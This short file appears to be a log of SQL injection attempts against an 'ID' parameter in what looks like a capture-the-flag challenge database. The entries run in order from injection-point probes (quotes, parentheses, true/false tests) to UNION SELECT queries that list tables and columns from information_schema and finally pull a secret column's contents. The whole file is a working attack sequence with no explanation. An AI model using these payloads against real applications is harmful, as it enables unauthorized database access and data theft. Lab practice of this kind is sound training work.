ID:1
ID:-1 union select 1,2,3 -- 
ID:-1 union select 1,2,3 #
ID:-1 union select 1,2,3
ID:-1) union select 1,2,3
ID:-1) union select 1,2,3 -- 
ID:1
ID:1
ID:1
ID:1'
ID:1"
ID:1" and 1=1 #
ID:1) and 1=1 #
ID:1) and 1=2 #
ID:1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'CHALLENGES' #
ID:-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'CHALLENGES' #
ID:-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'R0Y2LHLPA2' #
ID:-1) union select 1,group_concat(secret_46NL),3 from R0Y2LHLPA2  #
